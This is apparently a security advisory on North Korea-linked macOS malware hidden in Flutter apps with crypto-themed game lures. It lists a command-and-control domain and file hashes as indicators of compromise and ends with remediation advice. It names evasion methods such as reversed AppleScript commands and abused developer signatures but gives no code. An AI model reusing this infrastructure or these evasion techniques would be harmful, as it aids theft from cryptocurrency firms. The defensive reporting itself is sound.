Analysis Summary

North Korean threat actors have adopted a novel approach to target Apple macOS devices by embedding malware in applications built with the Flutter framework. This marks the first time such a tactic has been observed with malicious apps disguised as functional software, including a Minesweeper game named "New Updates in Crypto Exchange (2024-08-28)".

Researchers said the primary payload is written in Dart, a programming language associated with Flutter. The apps leverage game-themed lures, a technique previously linked to other North Korean groups like Moonstone Sleet. This suggests a consistent pattern of social engineering targeting cryptocurrency and decentralized finance (DeFi) businesses.

The distribution method of these samples remains unclear, with no evidence that they have been actively deployed against targets. However, researchers suspect that the samples could be part of a testing phase. The apps have been signed and notarized using compromised Apple developer IDs, enabling the bypassing of Apple’s security processes. Although Apple has revoked these signatures the malware, once executed establishes a connection with a command-and-control server ("mbupdate.linkpc[.]net") and processes malicious AppleScript commands written in reverse to evade detection.

Further investigation by the researchers revealed variants of the malware written in Golang and Python highlighting the actors’ use of multiple programming languages to obscure their activities. The Python variants, packaged with Py2App are similarly capable of executing AppleScript payloads received from the server. This multi-language approach indicates the actors’ intent to create diverse and frequently updated malware iterations to remain undetected, with Flutter's architecture offering enhanced obfuscation.

While the activity has not been attributed to a specific group, overlaps with infrastructure linked to previous campaigns suggest ties to a Lazarus sub-group, BlueNoroff. Known for targeting cryptocurrency firms, the group’s shift to using Flutter-built apps signifies an evolving strategy to infiltrate cryptocurrency organizations. These developments underscore the increasing sophistication and adaptability of DPRK-linked cyber operations, emphasizing their commitment to developing stealthy and innovative malware to achieve their objectives.

Impact

• Security Bypass
• Cryptocurrency Theft
• Financial Loss
• Unauthorized Access

Indicators of Compromise

Domain Name

• mbupdate.linkpc.net

MD5

• d4bcc74e261c5c5f5672b4e101965d8d
• 18c274cd1ea6a140a574327df01d9980
• c47932089c8db6bca6a2bb4173b74ca5
• 97b973d5efb2d2930286a4ba85dd3ae4
• f6357545c0ed118d0763ff6da8e04493
• 7c3f2e37aca9730e11a771fcd756963a
• 6817c88c299241643864cf35800d71d2
• ea0e8ea3aab4e93e2536dada37599e22
• f819817aad90aadfbb36d23cb4ee6234

SHA-256

• bfd3f0046b4c4221dfb5ae459c7ec3438de6bf69e263cfd01b256ffd0494ae07
• 55a746c1d61cd4db4018c468749e61cc79de56c37bd42fee5411873d1d91e4a5
• d62198d7d26bea9cebd71b2f04b02fe1a1467973a5eb891885fdb3e8d87c5d4c
• 435db426ea6410309487b2a1b3565e4c3f6c300d788850d2188255fc98bffb98
• e96a23042a0ed4217d6a90b2ecdcee2ec8eec7fbb275b9f21c998be2958c690f
• ab0a04e2a492fe19410ba395879a6c9eb9fa8b2aaf55c5fcf44666bb6a0a08b3
• f3d0b74410e6eb732579ba55b4e79fd63214e6fe78c9cc89aeb1dbcab7dec339
• 9803e2946f19710f4f78cf5c3fea52085304be4479487954f7e6945872c07b89
• a5a530fdecf65f6a48db6c496957116837d076fc15f732054a5e6334daf9f323

SHA1

• 6fa932f4eb5171affb7f82f88218cca13fb2bfdc
• a12ad8d16da974e2c1e9cfe6011082baab2089a3
• eadfafb35db1611350903c7a76689739d24b9e5c
• 7cb8a9db65009f780d4384d5eaba7a7a5d7197c4
• 0b9b61d0fffd52e6c37df37dfdffefc0e121acf7
• ee22e7768e0f4673ab954b2dd542256749502e97
• dd38d7097a3359dc0d1c999225286a2f651b154e
• 9598e286142af837ee252de720aa550b3bea79ea
• 90e0e88e5b180eb1663c2b2cfe9f307ed03a301b

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Only download apps from official app stores (Google Play Store and Apple App Store) and avoid third-party app sources.
• Review the permissions an app requests during installation. If an app asks for excessive permissions that are unrelated to its functionality, consider it a red flag.
• Never trust or open links and attachments received from unknown sources/senders.
• Encourage individuals to report any suspicious activities, emails, or messages to relevant authorities, organizations, or cybersecurity experts.
• Verify the authenticity of websites, social media profiles, and apps before providing personal information or engaging with them.
• Implement strong, multi-factor authentication (MFA) for email accounts, social media profiles, and other sensitive online services.
• Keep all software and operating systems up to date with the latest security patches to minimize vulnerabilities.
• Employ robust network security measures, including firewalls and intrusion detection systems, to detect and block malicious network traffic.
• Develop and maintain an incident response plan that outlines steps to take in case of a security breach. Ensure that individuals and organizations know how to respond effectively.
• Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
• Refrain from downloading apps from unofficial sources or third-party app stores. These sources are less regulated and more prone to hosting malicious apps.
• Patch and upgrade any platforms and software timely and make it into a standard security policy. Prioritize patching known exploited vulnerabilities and zero-days.
• Enable antivirus and anti-malware software and update signature definitions promptly. Using a multi-layered protection is necessary to secure vulnerable assets.